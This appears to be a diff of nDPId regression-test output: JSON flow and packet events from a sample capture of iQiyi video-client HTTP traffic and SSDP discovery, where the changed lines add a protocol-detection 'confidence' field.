 00778{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"ts_msec":1467353196856,"pkt":"TF4M6gNlABxCjnAxCABFAAEhMu5AAIAGSgnAqHMI3xpqFMZaAFCbMnrue8hN51AYAQSXSQAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMS5qcGc\/bm89MSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1461,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196856,"flow_last_seen":1467353196856,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353196856,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_1.jpg?no=1","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1467353196917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjVAADgGss\/fGmoUwKhzCABQxlp7yE3nmzJ751AQAB9cGQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozNiBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY2MTIxMQ0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTUgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDENClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAHAQAAEDAwMCAwUEBAoDCgcAIwECAwQFBhEAEiEHMRMiQQgUUWFxFSMygUKRobEJFiQzUmJywdHwJYLhFzRDc5KywsTS1CY1U2Oiw\/EYNkR0g4aTlKSz01RWZGZ1doSjtBknRUZVhZWWxdW14jdXZf\/EAB0BAAIDAQEBAQEAAAAAAAAAAAUGAwQHAgEIAAn\/xABKEQACAQMDAQUEBwYFAwQBAQkBAgMABBEFEiExBhMiQVEUYXGRIzKBobHB0QcVJELh8DM0UmJyFiXxJjU2Q4KSF0RTc6LCY7LS\/9oADAMBAAIRAxEAPwDytAyeNWtFoU6vyTFgRlSXcbsJ9B8fl+eqxHqdN32eupf+5vW5UmPVHaHUHUpMapNHCmlDdxnBxnP7NTSEouRRHT4I7mdYpW2g0MdQukl49JKsmm3fb0+gS3BuZ97aKUPpwDubWPK4MKHKVEc6GfB+71qP21vapV7RkmgxSmNKRQ8iNNSkh8JU22lxLigdq962\/E4T5c4BOs+RYyXt+9GvEJIzXtxb9zIY85++q2mvKhvb0f6yf6Q1fvM+8sb2vwajqp2x9KEaMLI6f1e5vG9xjq92\/SfdVsZCvmo9z8k5+mpopSG2jmvYSyHaelDtuyUwH0vLXs82ngvqqxcNDk0eP4PljJZU\/wCH5nMjBx9B66X\/AFL6K3H04lNe+x25cNxhuQ3JiKK0bVDI3DgpPxyPz0GUyqzaa9vjp93WrCfER6D4jRLayjnijVvclPAKOG4EOlTUKQvwv6qv0vppy2vUkLpxXv3o2+XSltd5ittlC0KkPf8ACSZPJ47AZ9NGTdbjURtq"}
 02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1467353196917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353196917,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUDjZAADgGss7fGmoUwKhzCABQxlp7yFLTmzJ751AQAB+1AQAAFHWnfu3ebsPmflqKi8LbOppt0aSln8a0oQnzOKX6fXTzo\/s7tX30MrdPrafdJ9wOpqEVa0+eCttATGWR8cDKh8HCNIf2Y7kse++qsW3Z9ZRJmISqRHhlv7ua8gbtu88KwMqCRndtPwwr0FYe3t6IW8WfGaEajdpKO6T7a8f7q6eXHYM73S46PKpTyVFtK32z4SyP6Dn4VD6HUejUGdXqrT6VTI\/vdSmvtxYrHiJaC1rVtGVnhKfUlR4AJ16QVv3OsV+5oM2OzU4HhtpejSW0raWT2G05\/CnHPx0obh9myNSbjod09Pap\/FmsUupt1BtqSFvxFhIVlBSDuGc4POMZxg6\/XEcyITHyaXYrUM4B6Gst3D0dv22KjesSo2u6f4mtIdrsiFKafZjNrwULQrI8Tck7ylIyACVAaiTOjt7U2gUet1O2pFNpVZYVKp8lx5twPNBIWVHYo+Gdp3bV4OAT6a0xfk3q\/SqN1XjzmEVOHe7qXEyae+XGKY3w2pLbYTkbmQG1KIB8iTyd2lNevUKq1roxZ9hNOOsfYa1eNIShLQeSlstNIGw5O1CnASr8W7nOlh7u7jOGFMEOl2hfEkoApQO9P60p+VHRCeW9Ec2SG0srUtlWCdqwE+U4B4Vj8OhesUp+lSlx5aPCeR+JH6Q5wQfgc8YOmdXrjbcYne5Ux2lTJLiXHJbVVkuLOM\/i3K8xIJGVZ+Whhi7ZNK97Rs94XJTtcddcO4\/iJyfiSrOdXLa6mdvGK5v7Kygi320m41QWoypc57\/iT+8apK8zsqsv\/jDpm2pcKnrVl09bSdkbwvvd310AXb\/41P8AxaP3aMQybnNCnTFuDTCmX\/AehhjDIbSAPKnVJGrkeoyvd4EUynsZ2oT6D4nPH5n5aB6xc36KEI3fQaNvZ9v2pWncEydBmyKVU3Ep92qEfylsjdxnHGd37OdCJbRljMvU0q6Zo8N7cql0+1T5129VKLc\/Syqil3Xa9Qt6Y4kqZEyPtQ+njzNODyuDBTkpJxuGdLxuRMrLm2NCed3f0Ua2H7T3WGX7SU6g\/bURj3OhpKYcnGJKkqabS6HFA7Vblo8TAAx2ydKmO5DpLKWocZKNv6WdWraPwBzwa8vLeGwmMKDcR6HNLKkWS6k+LPgSD8vTRRGTIZ2tQ6a6P7RGNXc64okVKlPvo+m7QlVup7Dfkjqb\/I6u7iPOh+55T9XirgVKTSfPK4\/qJc1El3vLmJU2xD\/1lk6Cn788Zwq2hav62Tr4Xw5t8qUj\/V1x3j\/y8VaEMnklWFQg1yY2l9X3TKzhPwOO\/wCrOulNLqCW9q5pS38E5xrn\/HR+bQfdURl+9Ik+MiUCQkp27S3t7ZJwd2dc7URUalWIrlTZe+yVFXiOKSdnrjJHzx664DsR1oitrcEgAYqJ4K4v4Xx+rXwlFKfM\/wDs0YdYLVi2\/R6VPpjS\/DlZS67HytltSOVZVk4J3JIB+fOlYZC9vm8356mTGM1O9q8bbSc1bSFNq3bXV7tdLCXHlbfHA4yVHOAB+v8AdqvebmNspfcQUtr7HXFp7wVbtxV6HUrHCHb1qxDGAw39KNZfTyrU1Q94TGRmImaFLfH8yr8Kvz+HfUumWDVqp44YfiL8BxDToEgJCFKKgkHPx2q5Hw510nqOxJTJT\/Fqmp8SP7sOM+HyrCx\/X8xyeO6vUjFt"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1467353197131,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353197131,"pkt":"AQBef\/\/6dNArkea6CABFAAChc\/sAAAERIa3AqHMB7\/\/\/+scBB2wAjWbYTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1467353197240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1467353197240,"pkt":"AQBef\/\/6dNArkea6CABFAACXc\/0AAAERIbXAqHMB7\/\/\/+scBB2wAg2oBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhU2VydmVyOjENCk1hbjoic3NkcDpkaXNjb3ZlciINCk1YOjMNCg0K"}
 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1467353197271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"ts_msec":1467353197271,"pkt":"AQBef\/\/6dNArkea6CABFAACZc\/4AAAERIbLAqHMB7\/\/\/+scBB2wAhQmdTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhUmVuZGVyZXI6MQ0KTWFuOiJzc2RwOmRpc2NvdmVyIg0KTVg6Mw0KDQo="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAAUUM2tAAIAGCK3AqHMIb84WTcZbAFDJCjAgTd\/tYVAQAQRxYwAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZhbGJ1bV9pZD0xODA5MzIzMDEmYzE9NDc5NTMxMDAwJmNsdD1ob21lZGwmY249MTYwNTA1LSVFNiVBRCVBMyVFNyU4OSU4NyVFRiVCQyU5QSVFOSU4MyU5MSVFNiU4MSVCQSVFNiVBQyVBNyVFNSVCNyVCNCVFNCVCQSU4QyVFNiVBQyVBMSVFNSVCRCU5MiVFNiU5RCVBNSVFNSU4RiU4RCVFOSU4MCU4NiVFOCVBMiVBRC0lRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZjcHV1c2U9MTQuMSZkZT0zMmU2NTRmYTU3YmU5MGVjNjM4YzQ2ZGRmZGQ2Njc1NyZkbGx2PWFwcHYlM0Q1LjAuMC4xMDAzJTdDb2x2JTNENS4wLjAuMTEwMSZldD0wJmZ0PTIxNzUmaHQ9MCZodT0tMSZpc2RtPTAmaXNsb2NhbD0wJmt2PTEwLjAuMC4yOTMmbGFuZz0mbWVtcGh5PTY3Jm1lbXZpcj0xMjEmbXQ9MCZtdj01LjIuMTUuMjI0MCZwMj0xMDExJnBlPSZwb3B0PTAmcHQ9MiZwdHlwZT0xJnB1PSZyPTQ3OTUzMTAwMCZyX2lkPTQ3OTUzMTAwMCZyYT0xJnJuPTIzOTg3JnNjaG5faWQ9MjAwMDAzNzE5JTI0JTI0JTI0JTI0MTgwOTMyMzAxJnNjaG5fbmFtZT0lRTclQkIlQkMlRTglODklQkElRTUlQTglQjElRTQlQjklOTAlMjQlMjQlMjQlMjQlRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZzcHQ9MTQ2NzM1MzE5NyZzdGltZT0wJnR2aWQ9NDc5NTMxMDAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdXBsb2FkX2lkPSZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5pcWl5aS5jb20lMkZ2XzE5cnJsdnV4bGcuaHRtbCZ2PTIuMC4xMDIuMzAxNDcmdmU9MzMzODI1Y2RmNDg2Y2M5NGI2ZDI5NTZmNGRlNmQ0Y2ImdmlkPTJiOTQ3MjllM2E5MjBiMjExOTg4NmM1YzY3N2FlOWRiJm1zZz1NWHcwZkFkUUFGSURVZ0ZSU0FCNmR3TmtCUUptZlhWM2RubGhZbmxJQlhUVnh5NGFPTDBBZEM2UVdSYURTS0IxY29kZGkxT3J0aUF6TmYzSDhwZUN2MUwlMkZSMiUyQjZUWUZEVXptSXA5b29TJTJGc3FRME50aEpLVDNBSHRDSkg2SmFLSGQxS2RwTDZwRVJ5bTBKM0FOUWxWUzluQWx3bGw2ciUyQjNMVzlpbXVHd2ZoNCUzRCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6"}
-01899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
+01925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAABuM2xAAIAGDVLAqHMIb84WTcZbAFDJCjUMTd\/tYVAYAQQaAAAAIG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1467353198052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"ts_msec":1467353198052,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0gHZAADMGDQJvzhZNwKhzCABQxltN3+1hyQo1UlAYACMO1AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"ts_msec":1467353198532,"pkt":"TF4M6gNlABxCjnAxCABFAAEhM5pAAIAGSV3AqHMI3xpqFMZcAFDCryK2CgBK\/VAYAQQ7tAAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMi5qcGc\/bm89MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
